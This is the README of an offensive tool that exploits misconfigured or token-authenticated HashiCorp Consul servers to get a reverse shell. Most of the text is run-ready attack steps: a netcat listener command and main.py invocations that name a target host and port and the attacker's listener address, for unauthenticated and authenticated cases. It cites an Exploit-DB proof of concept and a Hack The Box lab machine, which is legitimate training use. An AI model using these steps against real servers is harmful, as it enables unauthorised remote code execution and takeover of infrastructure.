Consul Auto Exploiter

Consul Auto Exploiter can be used for scanning X-Consul-Token misconfigurations and achiving code execution (reverse shell) on Consul by HashiCorp.

Disclaimer

This is for legal and approved use only. Please do not go around spraying on stuff.

Installation

python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt

Usage

Consul should be accessible by host machine. You can browse http://consul_ip:consul_port/ui/ to see if UI is accesible.

Unauthenticated - Misconfigured

Start a listener.

nc -lnvp 5555

Exploit service.

python3 main.py RHOST RPORT LHOST LPORT
python3 main.py 240.0.0.1 8500 10.10.14.18 5555

Authenticated

Start a listener.

nc -lnvp 5555

Exploit service.

python3 main.py RHOST RPORT LHOST LPORT X-CONSUL-TOKEN
python3 main.py 240.0.0.1 8500 10.10.14.18 5555 28b14da1-f2e9-b1fa-433f-10d1f44d3345

ToDo

• Check for adding secrets anonymously.
• Scan endpoints for sensitive information exposure - unauth.
• Fuzz for token reading and related endpoints.
• Do a major conversion to make this a general scanner that does securiyt realated checks, not only exploiter.

Acknowledgments

• A very brief PoC was first created by GatoGamer1555 and 0bfxgh0st. Their work can be seen here: https://www.exploit-db.com/exploits/51117
• This tool can be used on HTB Heal for auto exploitation: https://app.hackthebox.com/machines/Heal